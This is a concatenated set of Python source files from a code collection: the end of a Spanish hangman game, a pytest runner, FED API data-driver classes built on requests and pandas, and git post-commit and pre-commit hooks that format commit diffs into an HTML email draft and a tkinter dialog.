elif guess in already_guessed:
print('Ya dijiste esa letra, intenta nuevamente')
elif guess not in 'abcdefghijklmnopqrstuvwxyz':
print('Se pidio una letra, intenta nuevamente')
else:
return guess
def get_difficulty():
clear_console()
difficulty = ' '
while difficulty not in 'FMD':
print('Ingrese dificultad:\n F - Facil\n M - Medio\n D - Dificil\n')
difficulty = input('Opcion: ').upper()
return difficulty
def play_again():
answer = input('\nQueres jugar de nuevo?\n Si | No\nOpcion: ')
return answer.lower().startswith('s')
def show_menu():
print(
'EL AHORCADO\n\n'\
'Ahora si vamos a jugar\n'\
'Elija una opcion:\n'\
' J - Jugar\n'\
' S - Salir\n'\
)
    answer = input('Opcion: ').lower()
    while answer not in ('j', 'jugar', 's', 'salir'):
        print(f'{answer} no es una respuesta valida, intente de nuevo')
        answer = input('Opcion: ').lower()
    return answer in ('j', 'jugar')
def reset(difficulty):
missed_letters = ''
correct_letters = ''
secret_set, secret_word = getRandomWord()
match difficulty:
case 'F':
correct_letters = secret_word[random.randrange(len(secret_word))]
correct_letters += secret_word[random.randrange(len(secret_word))]
case 'M':
correct_letters = secret_word[random.randrange(len(secret_word))]
frame = list(FRAMES['base'])
return [missed_letters, correct_letters, secret_set, secret_word, frame]
def develop_game(missed_letters, correct_letters, secret_set, secret_word, frame):
game_done = False
while not game_done:
clear_console()
print('El tipo de la palabra es: ' + secret_set)
displayBoard(missed_letters, correct_letters, secret_word, frame)
# Let the player type in a letter.
guess = getGuess(missed_letters + correct_letters)
if guess in secret_word:
correct_letters = correct_letters + guess
# Check if the player has won
found_all_letters = True
for i in range(len(secret_word)):
if secret_word[i] not in correct_letters:
found_all_letters = False
break
if found_all_letters:
clear_console()
print(FRAMES['win'])
print('\nSi!\nLa palabra secreta era: "' + secret_word + '"!\nGanaste')
game_done = True
else:
missed_letters = missed_letters + guess
# Check if player has guessed too many times and lost.
if len(missed_letters) == 6:
clear_console()
                print(FRAMES['lose'])
print('Te quedaste sin intentos!\nDespues de ' + str(len(missed_letters)) + ' fallos y ' + str(len(correct_letters)) + ' correctas adivinanzas,\nla palabra era "' + secret_word + '"')
game_done = True
def app():
play = show_menu()
while play:
difficulty = get_difficulty()
missed_letters, correct_letters, secret_set, secret_word, frame = reset(difficulty)
develop_game(missed_letters, correct_letters, secret_set, secret_word, frame)
play = play_again()
app()
clear_console()
print('EL AHORCADO\n\nGracias por jugar <3')
``` |
{
"source": "jjotterson/beafullfetchpy",
"score": 2
} |
#### File: datapungibea/tests/main.py
```python
import subprocess
import os
from datapungibea.utils import getUserSettings
def runTests(outputPath='',testsPath='',verbose = True):
if not testsPath:
testsPath = os.path.dirname(os.path.abspath(__file__)).replace("\\","/")
print('**************************** \nWill run tests in: ' + testsPath)
if not outputPath:
outputPath = "U:/"
try:
settingsFile = getUserSettings()
outputPath = settingsFile['TestsOutputPath']
    except Exception:
print("Could not load TestOutputPath from user settings. Perhaps run util.setTestFolder( FilePath ) ")
subprocess.Popen('pytest ' + testsPath + ' --html='+outputPath+'datapungibea_Tests.html --self-contained-html')
if verbose:
print('Tests will be saved in '+outputPath+'datapungibea_Tests.html \n****************************')
if __name__ == '__main__':
from sys import argv
import subprocess
import os
runTests()
#print(os.path.dirname(os.path.realpath(__file__)))
#query = subprocess.Popen('pytest --html=datapungibea_Tests.html')
#print(query)
``` |
{
"source": "jjotterson/datapungi_fed",
"score": 2
} |
#### File: datapungi_fed/datapungi_fed/driverCore.py
```python
import pandas as pd
import requests
import json
from copy import deepcopy
import pyperclip
import math
import re
import inspect
import yaml
import itertools
from datetime import datetime
import warnings
import functools
from textwrap import dedent
from datapungi_fed import generalSettings #NOTE: projectName
#import generalSettings #NOTE: projectName
from datapungi_fed import utils #NOTE: projectName
#import utils #NOTE: projectName
class driverCore():
r'''
Given a dbGroupName and its default db, starts a factory of query functions - ie, a function for
each db in the group. If dbGroupName is empty, return the list of dbGroups, dbs in the group, and their parameters
'''
def __init__(self,dbGroupName='', baseRequest={},connectionParameters={},userSettings={}):
#TODO: place defaultQueryFactoryEntry in yaml
self._dbParams, self.defaultQueryFactoryEntry = self._getDBParameters(dbGroupName)
self._ETDB = extractTransformDB(baseRequest,connectionParameters,userSettings) #a generic query is started
self._ETFactory = extractTransformFactory(dbGroupName,self._ETDB,self._dbParams,self.defaultQueryFactoryEntry)
self._driverMeta = driverMetadata()(dbGroupName)
self.__setdoc__(dbGroupName)
def __getitem__(self,dbName):
return(self._ETFactory.extractTransformFactory[dbName])
def __call__(self,*args,**kwargs):
out = self._ETFactory.extractTransformFactory[self.defaultQueryFactoryEntry](*args,**kwargs)
return(out)
def __setdoc__(self,dbGroupName):
if dbGroupName == '':
self.__doc__ = 'Returns the metadata of the dataset groups and their databases. Do not need inputs.'
else:
self.__doc__ = 'Queries the databases of {} \n \n'.format(dbGroupName)
for entry in self.__docParams__:
self.__doc__ += '- {short name}: {description} \n'.format(**entry)
self.__doc__ += ' parameters: {}\n'.format(str(entry['parameters']))
self.__doc__ += ' official database name: {}\n'.format(entry['database'])
self.__doc__ += '\nDefault query database: {}\n'.format(self.defaultQueryFactoryEntry)
self.__doc__ += "Sample functions: \n-data.{dbGroupName}() (default) \n-data.{dbGroupName}['{db}']() (query the {db} database)".format(**{'dbGroupName':dbGroupName.lower(),'db':self.defaultQueryFactoryEntry})
self.__doc__ += "\n\nNOTE: don't need to pass most parameters. Eg, api_key and file_type (json)."
def __str__(self):
return(self.__doc__)
def _getDBParameters(self,dbGroupName = ''):
r'''
The parameters of each database in the group (if empty returns all groups x databases)
'''
dataPath = utils.getResourcePath('/config/datasetlist.yaml')
with open(dataPath, 'r') as yf:
datasetlist = yaml.safe_load(yf)
if dbGroupName == '':
defaultDB = {}
return((datasetlist,defaultDB))
#get the entry of the group:
selected = list(filter( lambda x: x['group'] == dbGroupName , datasetlist))[0]
defaultDB = selected.get('default query','')
datasets = selected.get('datasets',{})
removeCases = lambda array: list(filter( lambda x: x not in ['api_key','file_type'] , array ))
dbParams = { entry['short name'] : { 'urlSuffix' : entry['database'] , 'json key': entry['json key'], 'params': removeCases(entry['parameters']) } for entry in datasets }
self.__docParams__ = datasets #parameters used to write a doc string for the class instance.
return((dbParams,defaultDB))
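# Sketch of the config/datasetlist.yaml shape that _getDBParameters expects,
# inferred from the keys it reads (values below are illustrative):
# - group: Series
#   default query: observations
#   datasets:
#     - short name: observations
#       description: data values of a series
#       database: series/observations
#       json key: observations
#       parameters: [api_key, file_type, series_id, realtime_start]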
class extractTransformFactory():
r'''
given a groupName of databases, constructs dictionary of functions querying all of its databases
'''
def __init__(self,dbGroupName,ETDB,dbParams,defaultQueryFactoryEntry):
if dbGroupName:
self.dbGroupName = dbGroupName
self.dbParams = dbParams
self.ETDB = ETDB
self.ETDB(self.dbGroupName,self.dbParams) #update the connector to the databases with parameters specific to the collection of dbs.
self.extractTransformFactory = { dbName : self.selectDBQuery(self.query, dbName) for dbName in self.dbParams.keys() }
self.defaultQueryFactoryEntry = defaultQueryFactoryEntry #the entry in query factory that __call__ will use.
else:
self.extractTransformFactory = {}
def query(self,*args,**kwargs):
return( self.ETDB.query(*args,**kwargs) )
def selectDBQuery(self,queryFun,dbName):
r'''
        Specialize the generic query to dbName: returns a lambda that maps
        args/kwargs into a query of that database
'''
fun = functools.partial(queryFun,dbName)
lfun = lambda *args,**kwargs: fun(**self.getQueryArgs(dbName,*args,**kwargs))
#add quick user tips
lfun.options = self.dbParams[dbName]['params']
return(lfun)
def getQueryArgs(self,dbName,*args,**kwargs):
r'''
Map args and kwargs to driver args
'''
#paramaters to be passed to a requests query:
paramArray = self.dbParams[dbName]['params']
params = dict(zip(paramArray,args))
paramsAdd = {key:val for key, val in kwargs.items() if key in paramArray}
params.update(paramsAdd)
#non query options (eg, verbose)
otherArgs = {key:val for key, val in kwargs.items() if not key in paramArray}
return({**{'params':params},**otherArgs})
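# Example (illustrative): if dbParams['observations']['params'] begins with
# 'series_id', then getQueryArgs('observations', 'gnp', verbose=True) above yields
# {'params': {'series_id': 'gnp'}, 'verbose': True}.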
class extractTransformDB():
r'''
Functions to connect and query a db given its dbName and dbParams (see yaml in config for these).
'''
def __init__(self,baseRequest={},connectionParameters={},userSettings={}):
'''
loads generic parametes (ie api key, location fo data.)
'''
self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
self._baseRequest = self.getBaseRequest(baseRequest,connectionParameters,userSettings)
self._lastLoad = {} #data stored here to assist functions such as clipcode
self._transformData = transformExtractedData()
self._getCode = transformIncludeCodeSnippet()
self._cleanCode = "" #TODO: improvable - this is the code snippet producing a pandas df
def __call__(self,dbGroup,dbParams):
r'''
        Calling an instance loads the specific parameters of the databases in dbGroup
'''
self.dbGroup = dbGroup
self.dbParams = dbParams
def query(self,dbName,params={},file_type='json',verbose=False,warningsOn=True):
r'''
Args:
params
file_type
verbose
warningsOn
'''
# get requests' query inputs
warningsList = ['countPassLimit'] # warn on this events.
prefixUrl = self.dbParams[dbName]['urlSuffix']
output = self.queryApiCleanOutput(prefixUrl, dbName, params, warningsList, warningsOn, verbose)
return(output)
def queryApiCleanOutput(self,urlPrefix,dbName,params,warningsList,warningsOn,verbose):
r'''
Core steps of querying and cleaning data. Notice, specific data cleaning should be
implemented in the specific driver classes
Args:
self - should containg a base request (url)
urlPrefix (str) - a string to be appended to request url (eg, https:// ...// -> https//...//urlPrefix?)
params (dict) - usually empty, override any query params with the entries of this dictionary
warningsList (list) - the list of events that can lead to warnings
warningsOn (bool) - turn on/off driver warnings
verbose (bool) - detailed output or short output
'''
#get data
query = self.getBaseQuery(urlPrefix,params)
retrivedData = requests.get(** { key:entry for key, entry in query.items() if key in ['params','url'] } )
#clean data
df_output,self._cleanCode = self.cleanOutput(dbName,query,retrivedData)
#print warning if there is more data the limit to download
for entry in warningsList:
self._warnings(entry,retrivedData,warningsOn)
#short or detailed output, update _lastLoad attribute:
output = self.formatOutputupdateLoadedAttrib(query,df_output,retrivedData,verbose)
return(output)
def getBaseQuery(self,urlPrefix,params):
r'''
Return a dictionary of request arguments.
Args:
urlPrefix (str) - string appended to the end of the core url (eg, series -> http:...\series? )
dbName (str) - the name of the db being queried
params (dict) - a dictionary with request paramters used to override all other given parameters
Returns:
query (dict) - a dictionary with 'url' and 'params' (a string) to be passed to a request
'''
query = deepcopy(self._baseRequest)
#update query url
query['url'] = query['url']+urlPrefix
query['params'].update(params)
query['params_dict'] = query['params']
query['params'] = '&'.join([str(entry[0]) + "=" + str(entry[1]) for entry in query['params'].items()])
return(query)
def formatOutputupdateLoadedAttrib(self,query,df_output,retrivedData,verbose):
if verbose == False:
self._lastLoad = df_output
return(df_output)
else:
code = self._getCode.transformIncludeCodeSnippet(query,self._baseRequest,self._connectionInfo.userSettings,self._cleanCode)
output = dict(dataFrame = df_output, request = retrivedData, code = code)
self._lastLoad = output
return(output)
def cleanOutput(self,dbName,query,retrivedData):
r'''
        This is a placeholder - specific drivers should have their own cleaning method.
        This also sets self._cleanCode
'''
transformedOutput = self._transformData(self.dbGroup,dbName,self.dbParams,query,retrivedData)
return(transformedOutput)
def getBaseRequest(self,baseRequest={},connectionParameters={},userSettings={}):
r'''
Write a base request. This is the information that gets used in most requests such as getting the userKey
'''
if baseRequest =={}:
connectInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
return(connectInfo.baseRequest)
else:
return(baseRequest)
def _warnings(self,warningName,inputs,warningsOn = True):
if not warningsOn:
return
if warningName == 'countPassLimit':
'''
warns if number of lines in database exceeds the number that can be downloaded.
inputs = a request result of a FED API
'''
_count = inputs.json().get('count',1)
_limit = inputs.json().get('limit',1000)
if _count > _limit:
warningText = 'NOTICE: dataset exceeds download limit! Check - count ({}) and limit ({})'.format(_count,_limit)
warnings.warn(warningText)
class transformExtractedData():
def __call__(self,dbGroup,dbName,dbParams,query,retrivedData):
if dbGroup == 'Series':
return( self.cleanOutputSeries(dbName,dbParams,query,retrivedData) )
if dbGroup == 'Geo':
return( self.cleanOutputGeo(dbName,dbParams,query,retrivedData) )
else:
return( self.cleanOutput(dbName,dbParams,query,retrivedData) )
def cleanOutput(self, dbName, dbParams,query, retrivedData): #categories, releases, sources, tags
dataKey = dbParams[dbName]['json key']
cleanCode = "df_output = pd.DataFrame( retrivedData.json()['{}'] )".format(dataKey)
df_output = pd.DataFrame(retrivedData.json()[dataKey]) # TODO: deal with xml
warnings.filterwarnings("ignore", category=UserWarning)
setattr(df_output, '_meta', dict(filter(lambda entry: entry[0] != dataKey, retrivedData.json().items())))
warnings.filterwarnings("always", category=UserWarning)
return((df_output,cleanCode))
def cleanOutputSeries(self, dbName, dbParams,query, retrivedData): #series
dataKey = dbParams[dbName]['json key']
cleanCode = "df_output = pd.DataFrame( retrivedData.json()['{}'] )".format(dataKey)
df_output = pd.DataFrame(retrivedData.json()[dataKey]) # TODO: deal with xml
if dbName == 'observations':
seriesID = query['params_dict']['series_id'] #{ x.split('=')[0] : x.split('=')[1] for x in query['params'].split("&") }['series_id']
df_output = (df_output[['date','value']]
.assign( dropRow = lambda df: pd.to_numeric(df['value'],errors='coerce') )
.dropna()
.drop('dropRow',axis=1)
.assign(value=lambda df: df['value'].astype('float'), date=lambda df: pd.to_datetime(df['date'] ) )
.set_index('date')
.rename({'value':seriesID},axis='columns'))
codeAddendum = f'''\n
df_output = (df_output[['date','value']]
.assign( dropRow = lambda df: pd.to_numeric(df['value'],errors='coerce') )
.dropna()
.drop('dropRow',axis=1)
.assign(value=lambda df: df['value'].astype('float'), date=lambda df: pd.to_datetime(df['date'] ) )
.set_index('date')
.rename({{'value': '{seriesID}' }},axis='columns'))
'''
cleanCode += dedent(codeAddendum)
#TODO: relabel value column with symbol
warnings.filterwarnings("ignore", category=UserWarning)
setattr(df_output, '_meta', dict(filter(lambda entry: entry[0] != dataKey, retrivedData.json().items())))
warnings.filterwarnings("always", category=UserWarning)
return((df_output,cleanCode))
def cleanOutputGeo(self, dbName, dbParams,query, retrivedData): #categories, releases, sources, tags
if dbName == 'shapes':
dataKey = query['params_dict']['shape']
elif dbName == 'series' or dbName == 'data':
#reproducible code
cleanCode = "includeDate = lambda key, array: [ dict(**entry,**{'_date':key}) for entry in array ]"
cleanCode += "\ndictData = [ includeDate(key,array) for key,array in retrivedData.json()['meta']['data'].items() ]"
cleanCode += "\ndictDataFlat = [item for sublist in dictData for item in sublist]"
cleanCode += "\ndf_output = pd.DataFrame( dictDataFlat )"
#create dataframe
includeDate = lambda key, array: [ dict(**entry,**{'_date':key}) for entry in array ]
dictData = [ includeDate(key,array) for key,array in retrivedData.json()['meta']['data'].items() ]
dictDataFlat = [item for sublist in dictData for item in sublist]
df_output = pd.DataFrame( dictDataFlat )
#dataframe metadata
jsonMeta = retrivedData.json()['meta']
warnings.filterwarnings("ignore", category=UserWarning)
setattr(df_output, '_meta', dict(filter(lambda entry: entry[0] != 'data', jsonMeta.items())))
warnings.filterwarnings("always", category=UserWarning)
return((df_output,cleanCode))
else:
dataKey = dbParams[dbName]['json key']
cleanCode = "df_output = pd.DataFrame( retrivedData.json()['{}'] )".format(dataKey)
df_output = pd.DataFrame(retrivedData.json()[dataKey]) # TODO: deal with xml
warnings.filterwarnings("ignore", category=UserWarning)
setattr(df_output, '_meta', dict(filter(lambda entry: entry[0] != dataKey, retrivedData.json().items())))
warnings.filterwarnings("always", category=UserWarning)
return((df_output,cleanCode))
class transformIncludeCodeSnippet():
def transformIncludeCodeSnippet(self,query,baseRequest,userSettings={},pandasCode=""):
#load code header - get keys
apiCode = self.getApiCode(query,userSettings)
#load request's code
queryCode = self.getQueryCode(query,baseRequest,pandasCode)
return(apiCode + queryCode)
def getQueryCode(self,query,baseRequest,pandasCode=""):
queryClean = {'url':query['url'],'params':query['params']} #passing only these two entries of query; params_dict is dropped.
queryClean['url'] = 'url'
queryClean['params']=queryClean['params'].replace(baseRequest['params']['api_key'],'{}')+'.format(key)' #replace explicit api key by the var "key" poiting to it.
queryCode = '''\
query = {}
retrivedData = requests.get(**query)
{} #replace json by xml if this is the request format
'''
queryCode = dedent(queryCode).format(json.dumps(queryClean),pandasCode)
queryCode = queryCode.replace('"url": "url"', '"url": url')
queryCode = queryCode.replace('.format(key)"', '".format(key)')
queryCode = queryCode.replace('"UserID": "key"', '"UserID": key') #TODO: need to handle generic case, UserID, api_key...
return(queryCode)
def getApiCode(self,query,userSettings):
r'''
The base format of a code that can be used to replicate a driver using Requests directly.
'''
try:
url = query['url']
if userSettings:
apiKeyPath = userSettings['ApiKeysPath']
apiKeyLabel = userSettings["ApiKeyLabel"]
else:
            userSettings = generalSettings.getGeneralSettings( ).userSettings
apiKeyPath = userSettings['ApiKeysPath']
apiKeyLabel = userSettings["ApiKeyLabel"]
except:
url = " incomplete connection information "
apiKeyPath = " incomplete connection information "
#userSettings = utils.getUserSettings()
#pkgConfig = utils.getPkgConfig()
storagePref = apiKeyPath.split('.')[-1]
passToCode = {'ApiKeyLabel': apiKeyLabel, "url":url, 'ApiKeysPath':apiKeyPath} #userSettings["ApiKeyLabel"]
code = self.apiCodeOptions(storagePref)
code = code.format(**passToCode)
return(code)
def apiCodeOptions(self,storagePref):
        r'''
storagePref: yaml, json, env
'''
if storagePref == 'yaml':
code = '''\
import requests
import yaml
import pandas as pd
apiKeysFile = '{ApiKeysPath}'
with open(apiKeysFile, 'r') as stream:
apiInfo= yaml.safe_load(stream)
url,key = apiInfo['{ApiKeyLabel}']['url'], apiInfo['{ApiKeyLabel}']['key']
'''
elif storagePref == 'json':
code = '''\
import requests
import json
import pandas as pd
# json file should contain: {"BEA":{"key":"YOUR KEY","url": "{url}" }
apiKeysFile = '{ApiKeysPath}'
with open(apiKeysFile) as jsonFile:
apiInfo = json.load(jsonFile)
url,key = apiInfo['{ApiKeyLabel}']['url'], apiInfo['{ApiKeyLabel}']['key']
'''
else: #default to env
code = '''\
import requests
import os
import pandas as pd
url = "{url}"
key = os.getenv("{ApiKeyLabel}")
'''
return(dedent(code))
def clipcode(self):
r'''
Copy the string to the user's clipboard (windows only)
'''
try:
pyperclip.copy(self._lastLoad['code'])
except:
print("Loaded session does not have a code entry. Re-run with verbose option set to True. eg: v.drivername(...,verbose=True)")
class driverMetadata():
    def __call__(self,dbGroup):
        # Every named dataset group exposes the same query parameters; only the
        # fallback (empty group name) differs in the driver method it points to.
        method = "tags" if dbGroup in ('Categories', 'Releases', 'Series', 'Sources', 'Tags') else "datasetlist"
        self.metadata = [{
            "displayName": method,
            # Name of driver main function - run with getattr(data, method)()
            "method": method,
            "params": {'file_type': 'json', 'realtime_start': '', 'realtime_end': '', 'tag_names': '', 'exclude_tag_names': '', 'tag_group_id': '', 'search_text': '', 'limit': '', 'offset': '', 'order_by': '', 'sort_order': ''},
        }]
        return(self.metadata)
if __name__ == '__main__':
case = driverCore(dbGroupName = 'Series')
print(case('gdp',verbose=True))
```
#### File: datapungi_fed/datapungi_fed/drivers.py
```python
import pandas as pd
import requests
import json
from copy import deepcopy
import pyperclip
import math
import re
import inspect
import yaml
import itertools
import warnings
from datetime import datetime
from datapungi_fed import generalSettings # NOTE: projectName
#import generalSettings #NOTE: projectName
from datapungi_fed import utils # NOTE: projectName
#import utils #NOTE: projectName
from datapungi_fed.driverCore import driverCore
#from driverCore import driverCore
class datasetlist(driverCore):
def _query(self):
'''
Returns name of available datasets, a short description and their query parameters.
Args:
none
Output:
- pandas table with query function name, database name, short description and query parameters.
'''
#get all dictionary of all drivers (in config/datasetlist.yaml)
datasetlist = self._dbParams
datasetlistExp = [[{**entry, **dataset}
for dataset in entry.pop('datasets')] for entry in datasetlist]
datasetlistFlat = list(itertools.chain.from_iterable(
datasetlistExp)) # flatten the array of array
df_output = pd.DataFrame(datasetlistFlat)
return(df_output)
def __call__(self):
return(self._query())
if __name__ == '__main__':
d = datasetlist()
v = d(); print(v)
``` |
{
"source": "jjotterson/git-repo-hooks",
"score": 3
} |
#### File: jjotterson/git-repo-hooks/post-commit.py
```python
import sys
import os
import win32com.client as win32
import subprocess
import re
import html
import webbrowser
#import tempfile #TODO: include attachment to the email else save as
class CommitEmail():
"""
Produces an email from the lastest git commit. If exists, takes as input two files:
.git/hooks/hooks.approvallist
.git/hooks/hooks.mailinglist
that contain the list of approvers and other people that should get the email. Else,
starts an email without a recipient list.
"""
def __init__(self):
self.getrawdata()
#
def getrawdata(self):
self.raw = {}
# get email addresses to send message to (re-write as hookconfig file)
with open('.git/hooks/hooks.mailinglist', 'a+') as maillist, open('.git/hooks/hooks.approvallist', 'a+') as approvallist:
maillist.seek(0)
approvallist.seek(0)
self.raw['notify'] = maillist.read()
self.raw['request'] = approvallist.read()
#
#local and remote paths
        # make it easier for browsers other than Chrome to open (Firefox and Explorer; Firefox still needs checking)
self.raw['localPath'] = "file:///"+os.getcwd().replace('\\', '/')+"/"
remotePathCode = subprocess.Popen('git config --get remote.origin.url', stdout=subprocess.PIPE)
self.raw['remotePath'] = remotePathCode.stdout.read().decode('utf-8', 'replace').strip()
#
# get commit history:
LastCommit = subprocess.Popen('git log -p -1', stdout=subprocess.PIPE)
self.raw['diffLog'] = LastCommit.stdout.read().decode('utf-8', 'replace').strip()
#
return self.raw
#
def HTMLLineformat(self,codeLine,divIndex,stl = {}):
"""
transforms a line of the git diff in a line of HTML code
TODO: close the <li>
"""
output = codeLine
#
# Style options
if stl == {}:
stl['codeDivBackgroundColor'] = 'lightgrey'
stl['codeDivFontFamily'] = 'Consolas'
stl['codeDivDefaultFontColor'] = 'rgb(90, 90, 90)'
stl['codeDivStyle'] = '"background-color:{0};font-family:{1};color:{2};max-height:409px;overflow:auto;"'.format(
stl['codeDivBackgroundColor'], stl['codeDivFontFamily'], stl['codeDivDefaultFontColor'])
stl['atColor'] = '"Dodgerblue"' # '""' defaults to div font color.
stl['removedCodeColor'] = '"red"' # '"900C3F"'
stl['newCodeColor'] = '"green"'
stl['headColor'] = '"black"'
stl['linkColor'] = '"Dodgerblue"'
#
#
# note, divIndex starts at 0, after first @@ it becomes 1.
if output.startswith('--- a/'):
output = ''
if output.startswith('+++ b/'):
output = ''
if output.startswith('+'):
output = '<font color = ' + stl['newCodeColor'] + '>' + output + '</font>'
#
if output.startswith('-'):
output = '<font color = ' + stl['removedCodeColor'] + '>' + output + '</font>'
#
if output.startswith('@'):
# always start a div (of block code)
output = '<font color = ' + stl['atColor'] + '>' + output + '</font>'
if divIndex == 0:
output = '<div style=' + stl['codeDivStyle'] + '>' + output
divIndex = 1
# note, will put a link to the file location
if output.startswith('diff --git'):
output = output.replace('diff --git', '')
# strip removes whitespaces
output = re.sub(r'a/.(.*?)b/', '', output).strip()
# file locations:
localFileRepoLink = '<a href = "{0}" style = "color:Gray">Local File</a>'.format(
self.raw['localPath'] + output)
if self.raw['remotePath'] != '/':
remoteFileRepoLink = ', <a href = "{0}" style = "color:Gray">Remote File</a>'.format(
self.raw['remotePath'] + output)
else:
remoteFileRepoLink = ''
if divIndex == 0:
output = '<br><br><li> <em><font color = ' + stl['headColor'] + \
' size = 4> File Changed: ' + output + '</font></em>'
else:
output = '</div><br><br><li> <em><font color = ' + stl['headColor'] + \
' size = 4> File Changed: ' + output + '</font></em>'
divIndex = (divIndex + 1) % 2
# include link to file
output = output + \
'<br>[ {0} {1} ]'.format(localFileRepoLink, remoteFileRepoLink)
return [output, divIndex]
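    # Example: a diff line '+x = 1' comes back as
    # '<font color = "green">+x = 1</font>' under the default style above.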
#
def gitdiffToHTML(self):
"""
transform git diff log into HTML
        TODO: once escaping to HTML has started (html.escape), make sure the output stays valid HTML
"""
diffLog = self.raw['diffLog'].replace('\r', '').split('\n')
divIndex = 0
diffHTML = []
for x in diffLog:
output, divIndex = self.HTMLLineformat(html.escape(x), divIndex)
diffHTML.append(output)
#
diffHTML.insert(3, 'Local Path: <a href = "{0}" style = "color:Gray">'.format(
self.raw['localPath']) + self.raw['localPath'] + '</a>')
if self.raw['remotePath'] != '/':
diffHTML.insert(4, 'Remote Path: <a href = "{0}" style = "color:Gray">'.format(
self.raw['remotePath']) + self.raw['remotePath'] + '</a>')
#fix the ending of the HTML file
endDiv = ''
if divIndex == 1:
divIndex = 0
endDiv = '</div>'
#
diffHTML = '<ol>' + '<br>'.join(diffHTML) + endDiv + '</ol>'
#
# cosmetic - assure code is closer by a line to its filename block than to the next filename block
diffHTML = diffHTML.replace('<br><br><br><div', '<br><br><div')
#
return diffHTML
#
def Email(self,mailserver,send=0):
"""
Start an email or send it.
        If no mail server is provided, open the HTML in a browser instead.
        TODO: include the output as an attachment; support other email backends (smtp)
"""
if mailserver == 'outlook':
#Start email ##################################
os.startfile("outlook")
outlook = win32.Dispatch('outlook.application')
#
#start mail
mail = outlook.CreateItem(0)
#
#recipients
            recipients = self.raw['notify'] + ";" + self.raw['request']
            recipients = ";".join(set(recipients.split(";")))  # dedupe addresses
            mail.To = recipients
#
mail.Subject = '[[Committed Code Summary]]'
mail.HtmlBody = self.gitdiffToHTML()
#
#attachment = tempfile.NamedTemporaryFile( mode = 'w+t', suffix = '.txt')
# attachment.writelines(diffHTML)
#mail.Attachments.Add(Source = attachment.name)
#
if send == 0:
mail.Display(True)
else:
mail.send()
else:
html = '<html>' + self.gitdiffToHTML() +'</html>'
path = os.path.abspath('temp.html')
url = 'file://' + path
with open(path, 'w') as f:
f.write(html)
webbrowser.open(url)
print("\n", "****** Starting Post-Commit Hook ******")
CommitEmail().Email('outlook', send = 0 )
print("****** End of Post-Commit Hook ******", "\n")
```
#### File: jjotterson/git-repo-hooks/pre-commit.py
```python
import sys
import os
import subprocess
print("\n", "****** Pre-Commit Hook ******")
print( str(sys.argv))
#print( os.path.abspath(__file__) )
#v = sys.stdin.read().split()
#proc = subprocess.Popen(["git", "rev-list", "--oneline","--first-parent" , "%s..%s" %(old, new)], stdout=subprocess.PIPE)
#commitMessage=str(proc.stdout.readlines()[0])
#sys.stdin = open("CON", "r")
#rr = input('enter something: ')
##proc = Popen(h, stdin=sys.stdin)
#
#
#lintit = input('Commit anyway? [N/y] ')
#
#print(lintit)
#
#print('end of pre-commit')
#from tkinter import *
#
#window = Tk()
#
#window.title("Welcome to LikeGeeks app")
#
#window.mainloop()
import tkinter as tk
class Application(tk.Frame):
def __init__(self, master=None):
super().__init__(master)
self.fontsel = "Times"
self.Appconfigs()
#self.create_widgets()
self.MainContainers()
self.TopFrame()
self.SummaryFrame()
self.TestFrame()
self.DiffFrame()
def Appconfigs(self,title="Repo Pre-Commit Policy"):
self.master.title(title)
#self.master.option_add('*Font','Times')
#root.geometry('{}x{}'.format(950, 600))
def MainContainers(self):
#Main containers
self.frametop = tk.Frame(root,width=400, height=50, pady=3,padx = 1, bd=2, relief=tk.RIDGE)
self.framesum = tk.Frame(root,width=400, height=50, pady=3,padx = 1, bd=2, relief=tk.RIDGE)
self.frametest = tk.Frame(root,width=400, height=50, pady=3,padx = 1, bd=2, relief=tk.RIDGE)
self.framediff = tk.Frame(root,width=400, height=50, pady=3,padx = 1, bd=2, relief=tk.RIDGE)
#layout of the main containers
#root.grid_rowconfigure(1, weight=1)
#root.grid_columnconfigure(0, weight=1)
self.frametop.grid(row=0, sticky ="ew")
self.framesum.grid(row=1, sticky ="ew")
self.frametest.grid(row=2, sticky="ew")
self.framediff.grid(row=3, sticky="ew")
def TopFrame(self):
#top frame widgets
#
#Geometry
self.top_left = tk.Frame(self.frametop, width=550, height=190)
self.top_right = tk.Frame(self.frametop, width=550, height=190, padx=50, pady=3)
self.top_left.grid(row=0, column=0, sticky="ns")
self.top_right.grid(row=0, column=1, sticky="ns")
#
#Content
tk.Label(self.top_left, text="Pre-Commit Summary", font=(self.fontsel, 20), anchor = tk.W, justify = tk.LEFT, ).grid(row=0, column=0, sticky='e')
tk.Button(self.top_right, text="Exit").grid(row=0, column=1, sticky=tk.E)
tk.Button(self.top_right, text="Commit").grid(row=0, column=2, sticky=tk.E, padx = 20, pady = 10)
tk.Button(self.top_right, text="Commit & Push").grid(row=0, column=3, sticky=tk.E)
    def SummaryFrame(self,localPath="",remotePath="",Author="",AuthorEmail = "",CommFiles ="",Notify="",Request=""):
#Summary frame widgets
#Geometry
self.sum_left = tk.Frame(self.framesum)
self.sum_right = tk.Frame(self.framesum, padx=50, pady=3)
#
self.sum_left.grid(row=0, column=0, sticky="ns")
self.sum_right.grid(row=0, column=1, sticky="ns")
#left panel
tk.Label(self.sum_left, text="Author: ", anchor = tk.W, justify = tk.LEFT, ).grid(row=0, column=0, sticky='w')
tk.Label(self.sum_left, text= Author + " <" +AuthorEmail +">", anchor = tk.W, justify = tk.LEFT, ).grid(row=0, column=1, sticky='w')
#
tk.Label(self.sum_left, text="Notify to: " , anchor = tk.W, justify = tk.LEFT, ).grid(row=1, column=0, sticky='w')
mailLog = tk.Entry(self.sum_left)
mailLog.insert(0, Notify)
mailLog.grid(row=1,column=1,sticky='w')
#
tk.Label(self.sum_left, text="Request approval to: " , anchor = tk.W, justify = tk.LEFT, ).grid(row=2, column=0, sticky='w')
approvalLog = tk.Entry(self.sum_left)
approvalLog.insert(0, Request)
approvalLog.grid(row=2,column=1,sticky='w')
#
#right panel
tk.Label(self.sum_right, text="Remote Repo: ", anchor = tk.W, justify = tk.LEFT, ).grid(row=0, column=0, sticky='w')
tk.Label(self.sum_right, text= remotePath, anchor = tk.W, justify = tk.LEFT, ).grid(row=0, column=1, sticky='w')
tk.Label(self.sum_right, text="Local Repo: ", anchor = tk.W, justify = tk.LEFT, ).grid(row=1, column=0, sticky='w')
tk.Label(self.sum_right, text= localPath, anchor = tk.W, justify = tk.LEFT, ).grid(row=1, column=1, sticky='w')
#botton code
